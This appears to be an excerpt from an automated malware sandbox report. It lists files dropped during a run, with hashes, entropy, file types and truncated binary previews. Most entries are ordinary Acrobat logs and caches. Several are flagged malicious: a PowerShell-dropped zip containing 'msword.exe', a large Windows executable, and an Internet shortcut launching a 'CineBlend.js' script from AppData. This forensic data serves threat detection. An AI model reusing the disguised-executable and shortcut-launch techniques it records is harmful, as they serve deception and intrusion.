                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                      Category:dropped
                                      Size (bytes):144514
                                      Entropy (8bit):7.992637131260696
                                      Encrypted:true
                                      SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                      MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                      SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                      SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                      SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                      Malicious:false
                                      Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                      Category:dropped
                                      Size (bytes):144514
                                      Entropy (8bit):7.992637131260696
                                      Encrypted:true
                                      SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                      MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                      SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                      SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                      SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                      Malicious:false
                                      Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:ASCII text, with very long lines (393)
                                      Category:dropped
                                      Size (bytes):16525
                                      Entropy (8bit):5.330589339471305
                                      Encrypted:false
                                      SSDEEP:384:usQfQQjZyDzISMjg0svDBjA49Y0/sQHpMVhrSWD0Wny6WxIWd44mJmtaEKHvMMwh:Ink
                                      MD5:5BC0A308794F062FEC40F3016568DF9F
                                      SHA1:14149448191AB45E99011CBBEF39F2A9A03A0D15
                                      SHA-256:00D910C49F2885F6810F4019A916EFA52F12881CBF1525853D0C184E1B796473
                                      SHA-512:CF12E0787C1C2A129BE61C4572CF8A28FC48039B2ADFD1816E58078D8DD900771442F210C545AD9B3F4EAEC23F6F1480F7BBF262B6A631160B20D0785BC17242
                                      Malicious:false
                                      Preview:SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:171+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=eddad23d-dbc6-40b3-ba9e-21a55d862f0a.1696497318171 Timestamp=2023-10-05T10:15:18:172+0100 ThreadID=7060 Component=ngl-lib_NglAppLib Description="SetConfig:
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):15099
                                      Entropy (8bit):5.3636345176651945
                                      Encrypted:false
                                      SSDEEP:384:mh6EGEjEOEaEPEODEDEsEcEhErmaQJQQGQzl5l7a5azwDCwDiwDpwDOwDmRhGh+n:mYF+NHEPDcFbEqRcQtC3R6+Zd2zZY8m6
                                      MD5:67A7DE06D4ACA646C92CAF6A7CD52ACD
                                      SHA1:C96EECCDB298DCB929B4780A5A0E3DA164887E4C
                                      SHA-256:25DE8D2752241CF0198DBA9D496113A2ABFFDB85EA3CFDEF7F0B61D405E81DAF
                                      SHA-512:EFBAC882671011160E21569A558C8EB51AF99AE0F3DB540FA8064B0D4B42AACA19E25271C202745286088EEC7C9A59E1FCDE9E66C30BFDDCFB6486DDE94FAED9
                                      Malicious:false
                                      Preview:SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:864-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:869-0500 ThreadID=8092 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:869-0500 ThreadID=8092 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:869-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=8a5f8f76-05d9-4530-8786-5fc9ef54c8d1.1736063771864 Timestamp=2025-01-05T02:56:11:869-0500 ThreadID=8092 Component=ngl-lib_NglAppLib Description="SetConf
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):29752
                                      Entropy (8bit):5.381709327968033
                                      Encrypted:false
                                      SSDEEP:192:icbENIn5cbqlcbgIpLcbJcb4I5jcbKcbQIrxcbmIcbGI9HcbN:8qnXopZ50rh9I
                                      MD5:081745E36032E9412FDF5E4560135B53
                                      SHA1:90BB58B0253F6E970BFE7CC577EAD55C1160F377
                                      SHA-256:5C7653E519FEA75CDA22202D693D449E282316CE097C20590813EBBC91A6EF82
                                      SHA-512:3452CEE35B18747C7296FCBDCE18F3ACE6446C26E384D0122060231AC1A38B1E053492141F094FA7AAC84ADE382E8BFF2A07E75CF640CCB3F8D98ADC14DB38B3
                                      Malicious:false
                                      Preview:05-10-2023 10:01:02:.---2---..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:01:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:01:02:.Closing File..05-10-
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                      Category:dropped
                                      Size (bytes):386528
                                      Entropy (8bit):7.9736851559892425
                                      Encrypted:false
                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                      Malicious:false
                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                      Category:dropped
                                      Size (bytes):1407294
                                      Entropy (8bit):7.97605879016224
                                      Encrypted:false
                                      SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
                                      MD5:716C2C392DCD15C95BBD760EEBABFCD0
                                      SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                                      SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                                      SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                                      Malicious:false
                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                      Category:dropped
                                      Size (bytes):1419751
                                      Entropy (8bit):7.976496077007677
                                      Encrypted:false
                                      SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                      MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                      SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                      SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                      SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                      Malicious:false
                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                      Category:dropped
                                      Size (bytes):758601
                                      Entropy (8bit):7.98639316555857
                                      Encrypted:false
                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                      MD5:3A49135134665364308390AC398006F1
                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                      Malicious:false
                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):3511922
                                      Entropy (8bit):6.32262550846943
                                      Encrypted:false
                                      SSDEEP:49152:BZH8MW3UdWJhVmT6CpvDjgYDlw0kr1LKEKNoCo:/H8ZZvVopvgYD/kJLKEqu
                                      MD5:EF2620F66230219A51A6C2055066C3C3
                                      SHA1:394657C478086158830BE943C09630488BE56366
                                      SHA-256:B9C27330ED8EAE02A918901435A2D1F98EE20CB2390D9F69FC45A043F2009A5B
                                      SHA-512:C20357671E243AAD4A68251A6C49EC9BD69FBFBEF104BD73CA6903003D558159C2B5417924CC6228FBB5A8750FE3F24246C8A7686A823E27E7DB80EAE351023A
                                      Malicious:true
                                      Preview:PK...........Y'4....5...@.....msword.exe..|..?>.#..6...F........K\...!*.....%@-..J-.f.[.I'k..UD.....-m.W{..+b....6...b.H...u.......9....{...z......d...y...g...7.6A..H.!.....+.....F]..Q.K#.4...O.o..^S.j.w.....)..7...r.w..V.-....[.%.......f...w.......s..\.;uf!/.>.7.....#...v.{.....oI./.S.'..,....o...V.HK. .x..%.s.....B.H-.f.*.9...._.o..9../A.7..R......... ..)......+x/MM@f.Cxr....o#.m.....w...=.Z0......`.i.W|S.. .[&.k........4...l...&p....S..i.f.....:....5P..kV..y.'.A...W_n.yW..hxPD......_m7W....W...>.o.Z...2...}.J.Z]...^.x..U....2...8..G6y....A.....P...6.x.FT.w.......3.D.^.R.J.....aJ.[.W.a....\.g.....24.K|..........+.C..~fkG..Gq.6.v#..& ..s...G..0...h..QT..T_...h&DN..i@d(..~.....L|.^.0.....]...F...B.X....QK..w...;}...(....vQ.(.m#.K.....qP*A....\..1...3:Q.....s(_...v....A_Pjo..>.w..W....6.c`.U..#........]S..}.n..WZ.A.1.n.m..........v.%I.@.K.....7.....ZqU.u1.X..eKw.i.kj....O...w.P+.I..............;.<.w.V..)....6...b....Z.....V....E..L.h..6.78
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):524295939
                                      Entropy (8bit):4.230594067417474
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:6BCF42715FD1768FE1013C702612D0EE
                                      SHA1:D7AFFE603F5D7BBCA046AA4AB26BFA458C30C348
                                      SHA-256:71A2295583DB11053AC6D0A6770199352BC2F549212548D362E56258EE1CDD50
                                      SHA-512:E749B377C6B19BF8FC42C06FEF9A81024E66B190439260F7A7474EEED8A78E2FA2EA56614ACEB37110AC4ABA2772FDB144965CF99E091EFB39D444DAA2DA839F
                                      Malicious:true
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p......r.....@.................................@...........BU............@......`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...BU.......V..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):98682
                                      Entropy (8bit):6.445287254681573
                                      Encrypted:false
                                      SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                      MD5:7113425405A05E110DC458BBF93F608A
                                      SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                      SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                      SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                      Malicious:false
                                      Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):737
                                      Entropy (8bit):7.501268097735403
                                      Encrypted:false
                                      SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                      MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                      SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                      SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                      SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                      Malicious:false
                                      Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >), ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):101
                                      Entropy (8bit):4.871303939038379
                                      Encrypted:false
                                      SSDEEP:3:HRAbABGQaFyw3pYoqLTVSRE2J5okZYaLi2eOL9PWHq:HRYF5yjoqLTwi23oqLXL9Iq
                                      MD5:4D8878C8F97369C07F2F589950C73CC3
                                      SHA1:3F4C594B7DF39E32C0865D7BCC2F3CFCAA03698D
                                      SHA-256:FB31F2D5DCD04BEBD7270C787B13CD153056F8BE303A9273E8CF8BAC9DE7C692
                                      SHA-512:79B6425888FF860ED7D063B8C59BB0901EECA39D5E8E28B6AE7597BE34A34EC76EEE9320E5F38D847B17D9F29BAAE8AE5D236FA518BFC3D4FC2CC5B2D3ACC8A3
                                      Malicious:true
                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" ..
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PDF document, version 1.4, 1 pages
                                      Category:dropped
                                      Size (bytes):393964
                                      Entropy (8bit):7.894863553506209
                                      Encrypted:false
                                      SSDEEP:6144:fz/0MaxA4h4379ErMr1NPe8ThAvXG4e5c8m1TCso1/kWS7uu:fz/0MaqxKy1NkvXG4MpmNokF
                                      MD5:57F09EA46C7039EA45BB3FD01BBD8C80
                                      SHA1:1365FF5E6E6EFC3E501D350711672F6A232AA9F8
                                      SHA-256:3850E8022E3990B709DA7CDDBFD3F830EB86F34AF89D5939E2999C1E7DE9766F
                                      SHA-512:6DE0ACD9D03BDE584A7B2C2C7781530BA7504622B518523993311AD6174D2A9890E9D230A2A3A51D76615111A9F62259A9615378440690F20708B201B19A17F8
                                      Malicious:true
